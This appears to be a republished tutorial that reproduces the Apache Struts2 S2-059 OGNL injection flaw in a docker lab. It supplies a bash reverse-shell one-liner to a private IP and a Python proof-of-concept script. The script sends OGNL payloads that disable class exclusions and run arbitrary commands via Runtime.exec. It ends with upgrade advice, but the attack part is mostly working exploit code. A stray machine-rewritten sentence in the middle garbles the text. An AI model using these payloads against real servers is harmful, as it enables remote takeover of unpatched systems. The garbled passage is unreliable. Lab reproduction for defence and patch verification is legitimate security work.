How does the Struts2 S2-059 remote code execution vulnerability reproduce?

0x00Introduction

Struts2 is a very powerful Java Web open source framework launched by the Apache software organization, which is essentially equivalent to a servlet. Struts2 is based on MVC architecture and has a clear framework structure. It is usually used as a controller to establish data interaction between models and views, and is used to create enterprise-level Java web applications. It utilizes and extends the Java Servlet API and encourages developers to adopt the MVC architecture. Struts2 takes the excellent design ideas of WebWork as the core, absorbs some advantages of the Struts framework, and provides a neater Web application framework implemented in the MVC design pattern.

0x01 Vulnerability Overview

An attacker can construct a malicious OGNL expression and set it to be modified by external input, and the OGNL expression will be executed. The attribute value of the Struts2 tag triggers OGNL expression parsing, ultimately causing remote code execution.

0x02 Scope of influence

Struts 2.0.0 – Struts 2.5.20

0x03 Environment setup

1. This vulnerability environment is quickly built using vulhub. The download address of vulhub is as follows:

https://github.com/vulhub/vulhub

cd vulhub-master/struts2/s2-059

2. Use docker-compose to quickly build a shooting range environment

docker-compose up -d

3. After the startup is completed, visit http://ip:8080/?id=1 in the browser and you can see the test interface

0x04 vulnerability recurrence

1. Visit http://ip:8080/?id=%{88*88} in the browser, you can find that the executed 88*88 is successfully parsed, and the OGNL expression will be executed. The attribute value of the Struts2 tag triggers OGNL expression parsing.

2. Use poc to rebound the shell. The payload of the rebound shell needs to be encoded in base64

bash -i >& /dev/tcp/172.16. 1.132/9967 0>&1

base64 encoded URL:

The original sentence is already a complete sentence that is providing a link. If I were to rewrite it, it could be something like: Here is a link to a webpage containing information about runtime exec payloads: http://www.jackson-t.ca/runtime-exec-payloads.html.

import requests

url = "http://127.0.0.1:8080"

data1 = {

"id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"

}

data2 = {

"id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('payload-base64编码'))}"

}

res1 = requests.post(url, data=data1)

res2 = requests.post(url, data=data2)

3. Modify the payload in the poc to your own payload, and then run it using python, you can see that the shell bounces

##0x05 Repair Suggestions

1. Upgrade to Struts 2.5.22 or higher

2. Enable ONGL expression injection protection measures.

https://struts.apache.org/security/#proactively-protect-from-ognl-expression-injections-attacks-if-easily-applicable

The above is the detailed content of How does the Struts2 S2-059 remote code execution vulnerability reproduce?. For more information, please follow other related articles on the PHP Chinese website!